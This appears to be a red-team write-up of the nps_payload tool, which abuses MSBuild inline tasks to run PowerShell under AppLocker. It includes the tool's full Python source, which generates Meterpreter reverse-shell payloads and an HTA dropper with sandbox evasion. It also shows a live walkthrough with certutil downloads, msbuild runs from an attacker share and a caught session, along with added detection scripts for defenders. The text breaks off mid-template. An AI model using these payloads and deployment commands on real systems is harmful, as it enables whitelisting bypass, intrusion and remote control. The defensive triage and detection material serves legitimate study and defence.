MSBuild nps_payload

Microsoft ships a number of binaries with the .NET Framework that can compile and execute code. MSBuild was originally introduced so that developers could build products in environments where Visual Studio is not installed. Its project files are XML, and since MSBuild 4.0 a project can declare an inline task (a UsingTask element with TaskFactory="CodeTaskFactory") whose C# source is compiled and executed in-process when the project is built. Because MSBuild is a signed Microsoft binary under the Windows directory, and because it compiles and runs whatever managed code the project file hands it, an attacker can use it to execute code under AppLocker and other application whitelisting solutions such as Device Guard that trust it.

Casey Smith (@subtee) has released several repositories that serve as proof of concept for executing code this way and bypassing AppLocker restrictions.

Two TrustedSec team members, Larry Spohn (@spoonman1091) and Ben Mauch (@ben0xa), decided to take Ben’s Not PowerShell (nps) and Dave Kennedy’s unicorn and mash some of the functionality together with Casey’s sample and they came up with a new tool called nps_payload.

This tool generates a PowerShell payload, base64-encodes it and inserts it into the msbuild_nps.xml file; when msbuild.exe builds that file, the nps inline task decodes the payload and runs it through the System.Management.Automation engine inside the msbuild.exe process. Similar to Dave Kennedy’s unicorn, nps_payload also writes a Metasploit console resource file (msbuild_nps.rc) for the matching listener.
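To see what an incident responder is looking at when such a file turns up, here is an added triage script (written for this page, not part of nps_payload or TrustedSec’s code). It parses the UsingTask/CodeTaskFactory structure described above, pulls the base64 string out of the C# `string cmd = "...";` literal, decodes it and reports whether the task hosts the PowerShell engine and whether the script carries the endless Start-Sleep loop that nps_payload appends. SAMPLE_XML is constructed here with a harmless script in place of the msfvenom stager so it runs offline; element and attribute names are the ones msbuild_nps.xml itself uses.

```python
"""Triage an MSBuild project file for an inline C# task that hosts PowerShell.

Added example for this page; it is not part of nps_payload or any TrustedSec
code. SAMPLE_XML below is constructed here with a harmless payload.
"""
import base64
import binascii
import re
import xml.etree.ElementTree as ET

MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"

# Constructed sample: the msbuild_nps.xml skeleton with a harmless script in
# place of the msfvenom stager (the trailing loop is what nps_payload appends).
SAMPLE_PS1 = 'Write-Output "hosted powershell"\nfor (;;){\n  Start-sleep 60\n}'
SAMPLE_B64 = base64.b64encode(SAMPLE_PS1.encode("utf-8")).decode("ascii")
SAMPLE_XML = f"""<Project ToolsVersion="4.0" xmlns="{MSBUILD_NS}">
  <Target Name="npscsharp">
    <nps />
  </Target>
  <UsingTask TaskName="nps" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs"><![CDATA[
        using System.Management.Automation;
        public class nps : Task, ITask {{
          public override bool Execute() {{
            string cmd = "{SAMPLE_B64}";
            PowerShell ps = PowerShell.Create();
            ps.AddScript(Base64Decode(cmd));
            ps.Invoke();
            return true;
          }}
        }}
      ]]></Code>
    </Task>
  </UsingTask>
</Project>"""

B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')   # C# string literal that looks like base64
INFINITE_LOOP = re.compile(r"for\s*\(\s*;\s*;\s*\)", re.I)


def inline_tasks(xml_text):
    """Yield (task_name, references, c#_source) for each CodeTaskFactory task."""
    root = ET.fromstring(xml_text)
    for task in root.iter(f"{{{MSBUILD_NS}}}UsingTask"):
        factory = task.get("TaskFactory", "").lower()
        if factory not in ("codetaskfactory", "roslyncodetaskfactory"):
            continue
        refs = [r.get("Include", "") for r in task.iter(f"{{{MSBUILD_NS}}}Reference")]
        # ElementTree hands back the CDATA body as plain text
        code = "".join(c.text or "" for c in task.iter(f"{{{MSBUILD_NS}}}Code"))
        yield task.get("TaskName", "?"), refs, code


def decode_b64_literals(code):
    """Decode every base64-looking C# string literal that yields valid UTF-8."""
    decoded = []
    for literal in B64_LITERAL.findall(code):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return decoded


def triage(xml_text):
    """Return one finding per inline task; empty list when the project has none."""
    findings = []
    for name, refs, code in inline_tasks(xml_text):
        payloads = decode_b64_literals(code)
        findings.append({
            "task": name,
            # the nps task needs the PowerShell engine assembly and PowerShell.Create()
            "hosts_powershell": any("system.management.automation" in r.lower() for r in refs)
                                or "PowerShell.Create" in code,
            "references": refs,
            "decoded_payloads": payloads,
            # nps_payload appends for(;;){Start-sleep 60} to keep msbuild.exe resident
            "keeps_process_alive": any(INFINITE_LOOP.search(p) for p in payloads),
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_XML):
        print(f"task {f['task']}: hosts_powershell={f['hosts_powershell']} "
              f"keeps_process_alive={f['keeps_process_alive']}")
        for p in f["decoded_payloads"]:
            print("--- decoded payload ---")
            print(p)
```

Point the script at a recovered msbuild_nps.xml (or a resource1.xml dropped in %TEMP% by the HTA variant) to get the decoded PowerShell back without running it; a real msfvenom stager decodes to a script with an inline byte array rather than the one-liner used here.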

There are two ways to deploy the msbuild_nps.xml file. The first is to copy it to the target and run it with the .NET Framework’s msbuild.exe:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\<path_to_msbuild_nps.xml>

The second is to host msbuild_nps.xml on an SMB share and pass the UNC path to msbuild.exe:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attacker_ip>\<share>\msbuild_nps.xml

Either way runs the encoded PowerShell payload through nps and returns a shell to the attacker. The generated script ends in an endless Start-Sleep loop so that msbuild.exe, and the Meterpreter thread inside it, stays alive until the attacker has migrated to another process. Note that nps runs the PowerShell code in-process through the System.Management.Automation engine without invoking powershell.exe, so no powershell.exe process creation appears in Event ID 4688 (A new process has been created); the only process-creation record is msbuild.exe itself.

For defenders: with the "Include command line in process creation events" audit policy enabled, monitor Event ID 4688 for invocations of msbuild.exe and inspect the command line for project files passed by UNC path or from unusual local locations (a .xml under the framework directory, %TEMP% or a user profile rather than a source tree). Also enable PowerShell script block logging and review Event ID 4104 (Microsoft-Windows-PowerShell/Operational) for the encoded or shellcode-carrying script the nps task hands to the engine; because the engine is hosted in msbuild.exe rather than powershell.exe, the process-creation trail alone will not show the PowerShell stage.
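The two detections above as rules over sample records, as an added example for this page (not TrustedSec’s code). EVENTS is constructed here and mimics the EventData fields of Security 4688 (NewProcessName, CommandLine, ParentProcessName) and PowerShell/Operational 4104 (ScriptBlockText); the host names, paths and the truncated script block are made up, and a real pipeline would fill the same dicts from winlogbeat, Sysmon or Get-WinEvent. It also shows what happens when command-line auditing is off, and uses the parent-process hint that the wmiexec.py and .hta deployment paths leave behind.

```python
"""Detection logic for msbuild.exe/nps abuse, run over constructed log records.

Added example for this page; it is not TrustedSec or nps_payload code. EVENTS
is constructed here; field names mirror the Windows event XML.
"""
import re

EVENTS = [
    # 0: nps_payload run from an SMB share, as on this page
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "CommandLine": r"msbuild.exe \\192.168.178.12\share\msbuild_nps.xml",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe"},
    # 1: local deployment, project file pulled down with certutil
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": "MSBuild msbuild_nps.xml",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe"},
    # 2: benign Visual Studio build
    {"EventID": 4688,
     "NewProcessName": r"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\App\App.csproj /t:Build /p:Configuration=Release",
     "ParentProcessName": r"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"},
    # 3: wmiexec.py deployment on a host without command-line auditing (no CommandLine field)
    {"EventID": 4688,
     "NewProcessName": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    # 4: script block the nps task handed to the engine (msfvenom -f psh shape, bytes truncated)
    {"EventID": 4104,
     "ScriptBlockText": "[Byte[]] $sc = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0\n"
                        "$x = [System.Convert]::FromBase64String('aGVsbG8=')\n"
                        "for (;;){\n  Start-sleep 60\n}"},
    # 5: ordinary interactive PowerShell
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users | Select-Object Name"},
]

UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")             # \\host\share
PROJECT_ARG = re.compile(r'"([^"]+\.(?:xml|csproj|proj|targets|sln))"|(\S+\.(?:xml|csproj|proj|targets|sln))', re.I)
STAGING_DIRS = ("\\temp\\", "\\appdata\\", "\\users\\public\\", "\\downloads\\", "\\programdata\\")
SUSPICIOUS_PARENTS = {"wmiprvse.exe", "mshta.exe"}            # wmiexec.py and .hta deployment
SHELLCODE_BYTES = re.compile(r"(?:0x[0-9a-f]{2}\s*,\s*){8,}", re.I)
INFINITE_SLEEP = re.compile(r"for\s*\(\s*;\s*;\s*\)\s*\{[^}]*start-sleep", re.I)
SCRIPT_INDICATORS = (
    ("FromBase64String", "base64 content decoded at runtime"),
    ("VirtualAlloc", "VirtualAlloc via Add-Type/P-Invoke"),
    ("CreateThread", "CreateThread via Add-Type/P-Invoke"),
)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_4688(ev):
    """Reasons to flag a process-creation record; [] when nothing matches."""
    if basename(ev.get("NewProcessName", "")) != "msbuild.exe":
        return []
    reasons = []
    parent = basename(ev.get("ParentProcessName", ""))
    if parent in SUSPICIOUS_PARENTS:
        reasons.append("unusual parent process: " + parent)
    cmd = ev.get("CommandLine")
    if cmd is None:
        # Without 'Include command line in process creation events' the event
        # carries no CommandLine, so the project-file checks below cannot run.
        reasons.append("msbuild.exe started but command line not audited")
        return reasons
    if UNC_PATH.search(cmd):
        reasons.append("project file loaded over a UNC path")
    for m in PROJECT_ARG.finditer(cmd):
        arg = m.group(1) or m.group(2)
        if arg.lower().endswith(".xml"):
            reasons.append("project file with .xml extension: " + arg)
        if any(d in arg.lower() for d in STAGING_DIRS):
            reasons.append("project file in a user-writable directory: " + arg)
    return reasons


def check_4104(ev):
    """Reasons to flag a script block record; [] when nothing matches."""
    text = ev.get("ScriptBlockText", "")
    reasons = [why for needle, why in SCRIPT_INDICATORS if needle.lower() in text.lower()]
    if SHELLCODE_BYTES.search(text):
        reasons.append("inline byte array (msfvenom psh shellcode shape)")
    if INFINITE_SLEEP.search(text):
        reasons.append("endless Start-Sleep loop keeping the host process alive")
    return reasons


def triage(events):
    """Return [(index, reasons)] for every record that matched a rule."""
    rules = {4688: check_4688, 4104: check_4104}
    hits = []
    for i, ev in enumerate(events):
        reasons = rules.get(ev.get("EventID"), lambda _: [])(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in triage(EVENTS):
        print("event %d (ID %d):" % (i, EVENTS[i]["EventID"]))
        for r in reasons:
            print("   -", r)
```

The .xml-extension and staging-directory checks are heuristics: a build server that legitimately passes .xml project files needs an allow-list for its parent processes and paths, while the UNC-path check and the missing-CommandLine case are worth alerting on regardless.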

You can download nps_payload on TrustedSec’s GitHub at https://www.github.com/trustedsec/nps_payload

see it all in action

root@kali:/opt/nps_payload# ./nps_payload.py

                                     (            (
                              ) (    )\        )  )\ )
  (    `  )  (       `  )  ( /( )\ )((_)(   ( /( (()/(
  )\ ) /(/(  )\      /(/(  )(_)|()/( _  )\  )(_)) ((_)
 _(_/(((_)_\((_)    ((_)_\((_)_ )(_)) |((_)((_)_  _| |
| ' \)) '_ \|_-<    | '_ \) _` | || | / _ \/ _` / _` |
|_||_|| .__//__/____| .__/\__,_|\_, |_\___/\__,_\__,_|
      |_|     |_____|_|         |__/

v1.03


(1) Generate msbuild/nps/msf payload
(2) Generate msbuild/nps/msf HTA payload
(99) Quit

Select a task: 1

Payload Selection:

(1) windows/meterpreter/reverse_tcp
(2) windows/meterpreter/reverse_http
(3) windows/meterpreter/reverse_https
(4) Custom PS1 Payload

Select payload: 1
Enter Your Local IP Address (None): 192.168.178.12
Enter the listener port (443): 443
[*] Generating PSH Payload...
[*] Generating MSF Resource Script...
[+] Metasploit resource script written to msbuild_nps.rc
[+] Payload written to msbuild_nps.xml

1. Run "msfconsole -r msbuild_nps.rc" to start listener.
2. Choose a Deployment Option (a or b): - See README.md for more information.
a. Local File Deployment:
- %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml
b. Remote File Deployment:
- wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
3. Hack the Planet!!

serve the payload

root@kali:/opt/nps_payload# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.178.24 - - [07/May/2019 03:17:35] "GET / HTTP/1.1" 200 -
192.168.178.24 - - [07/May/2019 03:17:40] "GET /msbuild_nps.xml HTTP/1.1" 200 -

transfer msbuild_nps.xml to the target and run it

c:\Windows\Microsoft.NET\Framework\v4.0.30319>certutil.exe -urlcache -split -f http://192.168.178.12/msbuild_nps.xml msbuild_nps.xml
****  Online  ****
  0000  ...
  152a
CertUtil: -URLCache command completed successfully.

c:\Windows\Microsoft.NET\Framework\v4.0.30319>MSBuild msbuild_nps.xml
Microsoft (R) Build Engine Version 4.0.30319.1
[Microsoft .NET Framework, Version 4.0.30319.233]
Copyright (C) Microsoft Corporation 2007. All rights reserved.

Build started 5/7/2019 9:35:20 AM.

catch the shell with the generated resource script

root@kali:/opt/nps_payload# msfconsole -r msbuild_nps.rc
[*] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-] ***

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]

[*] Processing msbuild_nps.rc for ERB directives.
resource (msbuild_nps.rc)> use multi/handler
resource (msbuild_nps.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (msbuild_nps.rc)> set LHOST 192.168.178.12
LHOST => 192.168.178.12
resource (msbuild_nps.rc)> set LPORT 443
LPORT => 443
resource (msbuild_nps.rc)> set ExitOnSession false
ExitOnSession => false
resource (msbuild_nps.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (msbuild_nps.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.178.12:443 
msf5 exploit(multi/handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (179808 bytes) to 192.168.178.24
[*] Meterpreter session 1 opened (192.168.178.12:443 -> 192.168.178.24:49165) at 2019-05-07 03:18:42 -0400

msf5 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                        Connection
  --  ----  ----                     -----------                        ----------
  1         meterpreter x86/windows  HERCULES\Administrator @ HERCULES  192.168.178.12:443 -> 192.168.178.24:49165 (192.168.178.24)

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : HERCULES
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows

alternative download with certutil -VerifyCTL (the command reports failure but still writes the file as a hash-named .bin in the current directory)

PS C:\pentest> certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml
CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
CertUtil: ASN1 bad tag value met.

PS C:\pentest> dir *.bin

Directory: C:\pentest

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a----         5/7/2019   4:16 PM       5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin

PS C:\pentest> mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml

PS C:\pentest> dir *.xml

Directory: C:\pentest

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a----         5/7/2019   4:16 PM       5462 msbuild_nps.xml

the python code

#!/usr/bin/env python

# Written by Larry Spohn (@Spoonman1091)
# Payload written by Ben Mauch (@Ben0xA) aka dirty_ben
# TrustedSec, LLC
# https://www.trustedsec.com

from __future__ import print_function
import os
import sys
import netifaces as nic   # third-party: pip install netifaces
import pexpect            # third-party: pip install pexpect
import base64

class bcolors:
  BLUE = '\033[94m'
  GREEN = '\033[92m'
  WARNING = '\033[93m'
  WHITE = '\033[97m'
  ERROR = '\033[91m'
  ENDC = '\033[0m'
  BOLD = '\033[1m'
  UNDERLINE = '\033[4m'

listener_ip = "127.0.0.1"

# Configure for auto detection of local IP Address
local_interface = "ens33"

try:
    raw_input          # Python 2
except NameError:
    raw_input = input  # Python 3

# Enumerate the IPv4 address assigned to "iface"; None if the interface does
# not exist or has no IPv4 address (the caller then prompts for one)
def get_local_ip(iface):
  try:
    return nic.ifaddresses(iface)[nic.AF_INET][0]['addr']
  except (ValueError, KeyError, IndexError):
    return None

def generate_msfvenom_payload(msf_payload):
  global listener_ip

  if (listener_ip == "127.0.0.1"):
    local_ip = get_local_ip(local_interface)
    listener_ip = raw_input("Enter Your Local IP Address (%s): " % local_ip) or local_ip
    # get_local_ip() returns None when the interface has no IPv4 address
    while not listener_ip:
      listener_ip = raw_input("Enter Your Local IP Address: ")

  # Get listener port from user
  msf_port = raw_input("Enter the listener port (443): ") or 443

  # Generate PSH payload (x86, matching the 32-bit msbuild.exe under Framework\)
  print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating PSH Payload...")
  if os.path.exists("msf_payload.ps1"):
    os.remove("msf_payload.ps1")   # never reuse a stale payload from an earlier run
  output = pexpect.run("msfvenom -p %s LHOST=%s LPORT=%s --arch x86 --platform win -f psh -o msf_payload.ps1" % (msf_payload,listener_ip,msf_port))
  if not os.path.exists("msf_payload.ps1"):
    print(bcolors.ERROR + "[!]" + bcolors.ENDC + " msfvenom did not produce msf_payload.ps1:")
    print(output)
    sys.exit(1)

  # Generate resource script
  print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating MSF Resource Script...")
  with open("msbuild_nps.rc", "a") as msf_resource_file:
    payload_listener = "\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j -z" % (msf_payload, listener_ip, msf_port)
    msf_resource_file.write(payload_listener)

# Read a .ps1, append an endless sleep loop so msbuild.exe (and the Meterpreter
# thread inside it) stays resident, and base64-encode the result for the C# task
def encode_pshpayload(payload_file):
  global psh_payload

  with open(payload_file, "r") as psh_file:
    script = psh_file.read() + "\nfor (;;){\n  Start-sleep 60\n}"
  # b64encode() returns bytes on Python 3; decode to str so the "%s" in the
  # XML template does not emit b'...'
  psh_payload = base64.b64encode(script.encode('utf-8')).decode('ascii')
  return psh_payload

def generate_msbuild_nps_msf_payload():
  global psh_payload
  global listener_ip

  # Delete old resource script
  if os.path.exists("msbuild_nps.rc"):
    os.remove("msbuild_nps.rc")

  # Initilize new resource script
  msf_resource_file = open("msbuild_nps.rc", "a")
  msf_resource_file.write("use multi/handler")
  msf_resource_file.close()

  # Display options to the user
  print("\nPayload Selection:")
  print("\n\t(1)\twindows/meterpreter/reverse_tcp")
  print("\t(2)\twindows/meterpreter/reverse_http")
  print("\t(3)\twindows/meterpreter/reverse_https")
  print("\t(4)\tCustom PS1 Payload")

  options = {1: "windows/meterpreter/reverse_tcp",
             2: "windows/meterpreter/reverse_http",
             3: "windows/meterpreter/reverse_https",
             4: "custom_ps1_payload"
  }

  # Generate payload
  # raw_input() returns a string on both Python versions; int() it so the
  # options lookup works (Python 3's input() would hand back "1", not 1)
  try:
    msf_payload = int(raw_input("\nSelect payload: "))
  except ValueError:
    print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Enter the number of a payload.")
    return
  if msf_payload not in options:
    print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Unknown payload selection.")
    return
  if (options[msf_payload] == "custom_ps1_payload"):
    custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
    encode_pshpayload(custom_ps1)
  else:
    generate_msfvenom_payload(options[msf_payload])
    encode_pshpayload("msf_payload.ps1")


  # Create msbuild_nps.xml
  msbuild_nps_file = open("msbuild_nps.xml", "w")
  msbuild_nps_file.write("""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe nps.xml -->
  <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
  <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
  <!-- License: BSD 3-Clause -->
  <Target Name="npscsharp">
   <nps />
  </Target>
  <UsingTask
    TaskName="nps"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
  <Task>
    <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[

          using System;
      using System.Collections.ObjectModel;
      using System.Management.Automation;
      using System.Management.Automation.Runspaces;
      using Microsoft.Build.Framework;
      using Microsoft.Build.Utilities;

      public class nps : Task, ITask
        {
            public override bool Execute()
            {
              string cmd = "%s";

                PowerShell ps = PowerShell.Create();
                ps.AddScript(Base64Decode(cmd));

                Collection<PSObject> output = null;
                try
                {
                    output = ps.Invoke();
                }
                catch(Exception e)
                {
                    Console.WriteLine("Error while executing the script.\\r\\n" + e.Message.ToString());
                }
                if (output != null)
                {
                    foreach (PSObject rtnItem in output)
                    {
                        Console.WriteLine(rtnItem.ToString());
                    }
                }
                return true;
            }

            public static string Base64Encode(string text) {
           return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
        }

        public static string Base64Decode(string encodedtext) {
            return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
        }
        }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>""" % psh_payload)

  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")  
  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.xml")
  print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
  print("2. Choose a Deployment Option (a or b): - See README.md for more information.")
  print("  a. Local File Deployment:\n" + bcolors.WHITE + "    - %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe <folder_path_here>\\msbuild_nps.xml" + bcolors.ENDC)
  print("  b. Remote File Deployment:\n" + bcolors.WHITE + "    - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\\\<attackerip>\\<share>\\msbuild_nps.xml" + bcolors.ENDC)
  print("3. Hack the Planet!!")

  sys.exit(0)

def generate_msbuild_nps_msf_hta_payload():
  global psh_payload
  global listener_ip

  psh_payload = ""
  psh_payloads = ""
  payload_count = 1


  # Delete old resource script
  if os.path.exists("msbuild_nps.rc"):
    os.remove("msbuild_nps.rc")

  # Initilize new resource script
  msf_resource_file = open("msbuild_nps.rc", "a")
  msf_resource_file.write("use multi/handler")
  msf_resource_file.close()

  while True:
    # Display options to the user
    print("\nPayload Selection:")
    print("\n\t(1)\twindows/meterpreter/reverse_tcp")
    print("\t(2)\twindows/meterpreter/reverse_http")
    print("\t(3)\twindows/meterpreter/reverse_https")
    print("\t(4)\tCustom PS1 Payload")
    print("\t(99)\tFinished")

    options = {1: "windows/meterpreter/reverse_tcp",
               2: "windows/meterpreter/reverse_http",
               3: "windows/meterpreter/reverse_https",
               4: "custom_ps1_payload",
               99: "finished"
    }

    # Generate payloads
    # raw_input() returns a string on both Python versions; int() it so the
    # options lookup works (Python 3's input() would hand back "1", not 1)
    try:
      msf_payload = int(raw_input("\nSelect multiple payloads. Enter 99 when finished: "))
    except ValueError:
      print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Enter the number of a payload.")
      continue
    if msf_payload not in options:
      print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Unknown payload selection.")
      continue
    if (options[msf_payload] == "finished"):
      break
    elif (options[msf_payload] == "custom_ps1_payload"):
      custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
      encode_pshpayload(custom_ps1)
    else:
      generate_msfvenom_payload(options[msf_payload])
      encode_pshpayload("msf_payload.ps1")
      os.remove("msf_payload.ps1")

    # Generate payload vbs array string
    if (payload_count == 1):
      psh_payloads = "\"" + psh_payload + "\""
    else:
      psh_payloads += ", _\n\t\"" + psh_payload + "\""
    payload_count += 1

  # Create msbuild_nps.xml
  msbuild_nps_file = open("msbuild_nps.hta", "w")
  msbuild_nps_file.write("""<script language=vbscript>
  On Error Resume Next

  Set objFSO = CreateObject("Scripting.FileSystemObject")
  Set objShell = CreateObject("WScript.Shell")
  objTemp = objShell.ExpandEnvironmentStrings("%%TEMP%%")
  objWindir = objShell.ExpandEnvironmentStrings("%%windir%%")
  Set objWMIService = GetObject("winmgmts:\\\\.\\root\\CIMV2")
  arrUnicorns = Array(%s)

  ' Get logical processor count
  Set colComputerSystem = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem")
  For Each objComputerSystem In colComputerSystem
    objProcessorCount = objComputerSystem.NumberofLogicalProcessors
  Next

  ' Only run if system has more than 1 processor
  ' https://www.trustedsec.com/may-2015/bypassing-virtualization-and-sandbox-technologies/
  If objProcessorCount > 1 Then
    ' Sleep 60 seconds
    ' https://www.sans.org/reading-room/whitepapers/malicious/sleeping-sandbox-35797
    objShell.Run "%%COMSPEC%% /c ping -n 60 127.0.0.1>nul", 0, 1

    For Each objUnicorn in arrUnicorns
      x = x + 1

      ' Create MSBuild XML File
      CreateMSBuildXML objUnicorn, x

      ' Execute resource(x).xml using msbuild.exe and nps
      objShell.Run objWindir & "\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe %%TEMP%%\\resource" & x & ".xml", 0
    Next

    ' Cleanup
    For y = 1 To x
      Do While objFSO.FileExists(objTemp & "\\resource" & y & ".xml")
        objShell.Run "%%COMSPEC%% /c ping -n 10 127.0.0.1>nul", 0, 1
        objFSO.DeleteFile(objTemp & "\\resource" & y & ".xml")
      Loop
    Next
  End If

  window.close()

  ' Creates XML configuration files in the %%TEMP%% directory
  Function CreateMSBuildXML(objUnicorn, x)
    msbuildXML = "<Project ToolsVersion=" & CHR(34) & "4.0" & CHR(34) & " xmlns=" & CHR(34) & "http://schemas.microsoft.com/developer/msbuild/2003" & CHR(34) & ">" & vbCrLf &_
    "  <!-- This inline task executes c# code. -->" & vbCrLf &_
    "  <!-- C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe nps.xml -->" & vbCrLf &_
    "  <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->" & vbCrLf &_
    "  <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->" & vbCrLf &_
    "  <!-- License: BSD 3-Clause -->" & vbCrLf &_
    "  <Target Name=" & CHR(34) & "npscsharp" & CHR(34) & ">" & vbCrLf &_
    "   <nps />" & vbCrLf &_
    "  </Target>" & vbCrLf &_
    "  <UsingTask" & vbCrLf &_
    "    TaskName=" & CHR(34) & "nps" & CHR(34) & "" & vbCrLf &_
    "    TaskFactory=" & CHR(34) & "CodeTaskFactory" & CHR(34) & "" & vbCrLf &_
    "    AssemblyFile=" & CHR(34) & "C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" & CHR(34) & " >" & vbCrLf &_
    "  <Task>" & vbCrLf &_
    "    <Reference Include=" & CHR(34) & "System.Management.Automation" & CHR(34) & " />" & vbCrLf &_
    "      <Code Type=" & CHR(34) & "Class" & CHR(34) & " Language=" & CHR(34) & "cs" & CHR(34) & ">" & vbCrLf &_
    "        <![CDATA[" & vbCrLf &_
    "" & vbCrLf &_
    "          using System;" & vbCrLf &_
    "      using System.Collections.ObjectModel;" & vbCrLf &_
    "      using System.Management.Automation;" & vbCrLf &_
    "      using System.Management.Automation.Runspaces;" & vbCrLf &_
    "      using Microsoft.Build.Framework;" & vbCrLf &_
    "      using Microsoft.Build.Utilities;" & vbCrLf &_
    "" & vbCrLf &_
    "      public class nps : Task, ITask" & vbCrLf &_
    "        {" & vbCrLf &_
    "            public override bool Execute()" & vbCrLf &_
    "            {" & vbCrLf &_
    "              string cmd = " & CHR(34) & objUnicorn & CHR(34) & ";" & vbCrLf &_
    "              " & vbCrLf &_
    "                PowerShell ps = PowerShell.Create();" & vbCrLf &_
    "                ps.AddScript(Base64Decode(cmd));" & vbCrLf &_
    "" & vbCrLf &_
    "                Collection<PSObject> output = null;" & vbCrLf &_
    "                try" & vbCrLf &_
    "                {" & vbCrLf &_
    "                    output = ps.Invoke();" & vbCrLf &_
    "                }" & vbCrLf &_
    "                catch(Exception e)" & vbCrLf &_
    "                {" & vbCrLf &_
    "                    Console.WriteLine(" & CHR(34) & "Error while executing the script.\\r\\n" & CHR(34) & " + e.Message.ToString());" & vbCrLf &_
